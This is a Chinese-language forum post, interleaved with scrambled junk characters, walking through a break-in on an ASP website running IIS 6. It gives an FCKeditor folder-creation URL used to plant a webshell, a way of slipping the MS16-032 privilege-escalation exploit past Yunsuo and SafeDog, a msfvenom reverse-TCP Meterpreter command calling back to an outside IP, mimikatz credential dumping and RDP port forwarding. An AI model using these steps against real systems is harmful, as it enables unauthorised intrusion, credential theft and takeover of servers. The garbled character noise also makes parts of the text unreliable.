|
, z3 x& _6 K: f; a+ v! O. \
" Z; o* H9 w t3 r
* v: ?* R& b3 d7 c3 g9 h# \1 j6 i # V9 V7 p; S C' ^
|
' H8 m; x8 n. q# [ + `; r8 }$ N( t1 X* x, T- s' p
, e" v7 B( ? Y" F9 ~一、 利用getwebshell篇
0 w+ X: U- e- K7 F% J2 C' `' d
/ f# v% B) ?7 f# {* H& N4 B; W
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
( ]: z7 I! k2 ?6 E% @. y/ q
/ ~1 i6 e* e: Q% r4 v
6 W6 I% O3 x8 U; R$ ?1 G! _9 g9 S下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
! v( @) [+ q g3 b1 w0 g& X
4 T8 ]/ z) J; R3 L5 ^, @下面我们构造一个asp目录,如: 9 x B, ^8 B. C
6 Z3 U) m( a' L/ l6 U) Y 5 Z% T3 _: J* x) ?: |. s' t( F
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
0 J( R& K# p' z/ U ^# `8 ] . E6 r% T* ]7 Y0 ~ {, }: B3 n7 ]
5 } Z' r# s* [0 }* m6 W 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
) ?; _8 l0 F8 O
* V# O9 p( X: a a3 r; @! K一、 绕过安全狗云锁提权并且加账号
3 G* _0 e9 N: D3 Y% n
3 W" t% D$ j. s没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
' h! X9 q5 j$ w P$ R$ m# j4 G
2 b- m; F7 s C- r" Z2 e9 e
如图:
( V* o- u6 a' W! Z
4 L3 b5 x1 s3 R. W( `' K然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
2 J7 `8 C5 X6 o3 r
6 S7 E; Y& V) X; ]# T; U- E一、 利用metasploit
- S7 A, t o2 F* }% k% o
2 U8 Z4 F2 ^/ ]' j3 s8 B首先用pentestbox生成一个64位的payload如下命令
# c1 V6 b, a- c' C3 f m
6 m4 h. M' G5 d& ?msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
, Y: s8 Y7 z- F4 O
4 U* o" E B) g
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
* a7 {/ K; d' F% K5 a5 e
* P3 y/ A, c. _0 W- _1 k
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
% g+ U O' r5 J# w& V; I# Y
! n8 D9 Q# _& \# {* n8 }, C1 ?9 W
下面我们来做一个监听如下命令:
3 A) N6 s$ D# M6 q
; L9 E0 ^& D" u ?: U% w! I [3 F
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
8 Q) }2 U% e# ]4 w' G' c6 \
 + }1 B* A6 l- j. Y, ~1 v& i; ]
X7 |0 l: Y1 N | o7 x, `1 g3 w% w; l8 a3 G, @1 b% P
& q9 J- [" I8 T0 X, P' a
+ @/ X/ |7 X, _# f
2 [) A& C C2 s5 L) s2 @! \
8 u/ E3 U( E# A! r8 k. Q9 Y/ {9 U/ `0 ~
: g& Q$ Q' u2 C/ C* K/ o
) I2 O* K/ g2 X' t4 \
, H, T( x3 q/ v9 @9 e+ ?% b
+ j" {) x. g0 C- M
1 \; Q8 y; U+ H1 p% c
' S; p/ H2 c; H& P7 _- c
, h3 D7 W; a) Z0 [- ^7 \
4 L* K ? }6 ^3 n | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06